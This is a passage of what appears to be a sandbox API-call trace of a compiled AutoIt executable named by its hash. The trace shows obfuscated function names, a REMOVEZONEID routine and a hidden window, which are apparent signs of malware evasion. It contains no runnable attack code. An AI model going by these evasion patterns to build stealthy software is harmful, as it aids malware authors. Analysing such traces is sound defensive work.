dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.717] CharUpperBuffW (in: lpsz="_ARRAYADD", cchLength=0x9 | out: lpsz="_ARRAYADD") returned 0x9 [0117.717] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0117.717] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0117.717] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0117.717] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0117.718] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0117.718] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0117.718] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0117.719] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0117.719] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0117.719] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0117.719] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0117.720] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0117.721] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0117.721] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0117.721] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0117.721] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0117.721] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0117.721] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0117.722] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0117.722] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0117.722] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0117.722] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0117.722] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0117.722] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0117.722] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0117.722] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0117.723] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0117.723] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0117.723] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0117.723] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0117.723] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0117.724] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0117.724] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0117.724] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0117.724] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0117.724] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0117.725] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0117.725] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0117.725] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0117.725] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0117.725] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0117.725] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0117.725] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0117.725] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0117.725] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0117.726] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0117.726] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0117.726] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0117.726] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0117.726] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0117.727] CharUpperBuffW (in: lpsz="_FILECREATE", cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0117.727] CharUpperBuffW (in: lpsz="_FILECREATE", cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0117.727] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.727] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.727] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0117.727] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0117.727] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0117.727] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0117.728] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0117.728] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0117.728] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0117.728] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0117.728] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0117.728] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0117.728] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0117.729] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0117.729] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0117.729] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0117.730] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0117.730] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0117.730] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0117.730] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0117.730] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0117.730] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0117.731] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0117.731] CharUpperBuffW (in: lpsz="DBRUAIEIBZEWRGBQ", cchLength=0x10 | out: lpsz="DBRUAIEIBZEWRGBQ") returned 0x10 [0117.731] CharUpperBuffW (in: lpsz="DBRUAIEIBZEWRGBQ", cchLength=0x10 | out: lpsz="DBRUAIEIBZEWRGBQ") returned 0x10 [0117.731] CharUpperBuffW (in: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY", cchLength=0x19 | out: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY") returned 0x19 [0117.731] CharUpperBuffW (in: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY", cchLength=0x19 | out: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY") returned 0x19 [0117.731] CharUpperBuffW (in: lpsz="ACL", cchLength=0x3 | out: lpsz="ACL") returned 0x3 [0117.731] CharUpperBuffW (in: lpsz="ACL", cchLength=0x3 | out: lpsz="ACL") returned 0x3 [0117.732] CharUpperBuffW (in: lpsz="DHVWRCDTHNKPWFW", cchLength=0xf | out: lpsz="DHVWRCDTHNKPWFW") returned 0xf [0117.732] CharUpperBuffW (in: lpsz="DHVWRCDTHNKPWFW", cchLength=0xf | out: lpsz="DHVWRCDTHNKPWFW") returned 0xf [0117.732] CharUpperBuffW (in: lpsz="KHOCWHDEQXMSTFPOADRL", cchLength=0x14 | out: lpsz="KHOCWHDEQXMSTFPOADRL") returned 0x14 [0117.732] CharUpperBuffW (in: lpsz="KHOCWHDEQXMSTFPOADRL", cchLength=0x14 | out: lpsz="KHOCWHDEQXMSTFPOADRL") returned 0x14 [0117.732] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0117.732] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0117.732] CharUpperBuffW (in: lpsz="ASAZRREHKGLB", cchLength=0xc | out: lpsz="ASAZRREHKGLB") returned 0xc [0117.732] CharUpperBuffW (in: lpsz="ASAZRREHKGLB", cchLength=0xc | out: lpsz="ASAZRREHKGLB") returned 0xc [0117.732] CharUpperBuffW (in: lpsz="RSDBBCVUCE", cchLength=0xa | out: lpsz="RSDBBCVUCE") returned 0xa [0117.732] CharUpperBuffW (in: lpsz="RSDBBCVUCE", cchLength=0xa | out: lpsz="RSDBBCVUCE") returned 0xa [0117.732] CharUpperBuffW (in: lpsz="AJJMOCPPKFEWODWKA", cchLength=0x11 | out: lpsz="AJJMOCPPKFEWODWKA") returned 0x11 [0117.732] CharUpperBuffW (in: lpsz="AJJMOCPPKFEWODWKA", cchLength=0x11 | out: lpsz="AJJMOCPPKFEWODWKA") returned 0x11 [0117.733] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0117.733] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0117.733] CharUpperBuffW (in: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP", cchLength=0x1b | out: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP") returned 0x1b [0117.733] CharUpperBuffW (in: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP", cchLength=0x1b | out: lpsz="RARUCLGLLFJNMMTFCYMKXQZQIJP") returned 0x1b [0117.733] CharUpperBuffW (in: lpsz="SVEJXXJSKKUJZCUYVMSHAEL", cchLength=0x17 | out: lpsz="SVEJXXJSKKUJZCUYVMSHAEL") returned 0x17 [0117.733] CharUpperBuffW (in: lpsz="SVEJXXJSKKUJZCUYVMSHAEL", cchLength=0x17 | out: lpsz="SVEJXXJSKKUJZCUYVMSHAEL") returned 0x17 [0117.733] CharUpperBuffW (in: lpsz="QKSYGMNMNUOEXHVWRRODCJH", cchLength=0x17 | out: lpsz="QKSYGMNMNUOEXHVWRRODCJH") returned 0x17 [0117.733] CharUpperBuffW (in: lpsz="QKSYGMNMNUOEXHVWRRODCJH", cchLength=0x17 | out: lpsz="QKSYGMNMNUOEXHVWRRODCJH") returned 0x17 [0117.733] CharUpperBuffW (in: lpsz="LLBUPLMSHANIDLHCMEMP", cchLength=0x14 | out: lpsz="LLBUPLMSHANIDLHCMEMP") returned 0x14 [0117.733] CharUpperBuffW (in: lpsz="LLBUPLMSHANIDLHCMEMP", cchLength=0x14 | out: lpsz="LLBUPLMSHANIDLHCMEMP") returned 0x14 [0117.733] CharUpperBuffW (in: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV", cchLength=0x1d | out: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV") returned 0x1d [0117.733] CharUpperBuffW (in: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV", cchLength=0x1d | out: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV") returned 0x1d [0117.733] CharUpperBuffW (in: lpsz="MIVVMSGJPNONEWUB", cchLength=0x10 | out: lpsz="MIVVMSGJPNONEWUB") returned 0x10 [0117.734] CharUpperBuffW (in: lpsz="MIVVMSGJPNONEWUB", cchLength=0x10 | out: lpsz="MIVVMSGJPNONEWUB") returned 0x10 [0117.734] CharUpperBuffW (in: lpsz="GETDIR", cchLength=0x6 | out: lpsz="GETDIR") returned 0x6 [0117.734] CharUpperBuffW (in: lpsz="GETDIR", cchLength=0x6 | out: lpsz="GETDIR") returned 0x6 [0117.734] CharUpperBuffW (in: lpsz="REMOVEZONEID", cchLength=0xc | out: lpsz="REMOVEZONEID") returned 0xc [0117.734] CharUpperBuffW (in: lpsz="REMOVEZONEID", cchLength=0xc | out: lpsz="REMOVEZONEID") returned 0xc [0117.734] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7cfeb0, lpFilePart=0x7dfeb4 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x7dfeb4*="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") returned 0x62 [0117.734] GetSysColorBrush (nIndex=15) returned 0x1100074 [0117.734] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0117.735] LoadIconW (hInstance=0xf20000, lpIconName=0x63) returned 0x80299 [0117.738] LoadIconW (hInstance=0xf20000, lpIconName=0xa4) returned 0x0 [0117.738] LoadIconW (hInstance=0xf20000, lpIconName=0xa2) returned 0x0 [0117.745] LoadImageW (hInst=0xf20000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x0 [0117.745] RegisterClassExW (param_1=0x7dfe8c) returned 0xc1d8 [0117.745] GetSysColorBrush (nIndex=15) returned 0x1100074 [0117.745] RegisterClassExW (param_1=0x7dfe30) returned 0xc129 [0117.746] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc128 [0117.746] InitCommonControlsEx (picce=0x7dfe60) returned 1 [0117.778] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x14bf570 [0117.780] LoadIconW (hInstance=0xf20000, lpIconName=0xa9) returned 0xd02c7 [0117.895] ImageList_ReplaceIcon (himl=0x14bf570, i=-1, hicon=0xd02c7) returned 0 [0118.011] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0xf20000, lpParam=0x0) returned 0x802d6 [0118.867] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0x24, wParam=0x0, lParam=0x7dfa44) returned 0x0 [0118.868] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0x81, wParam=0x0, lParam=0x7dfa38) returned 0x1 [0118.875] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0x83, wParam=0x0, lParam=0x7dfa24) returned 0x0 [0119.428] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0119.429] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc128 [0119.429] CreatePopupMenu () returned 0x50075 [0119.430] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x802d6, hMenu=0x1, hInstance=0xf20000, lpParam=0x0) returned 0x401e8 [0119.515] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0x210, wParam=0x10001, lParam=0x401e8) returned 0x0 [0119.515] ShowWindow (hWnd=0x802d6, nCmdShow=0) returned 0 [0119.515] ShowWindow (hWnd=0x802d6, nCmdShow=0) returned 0 [0119.516] PeekMessageW 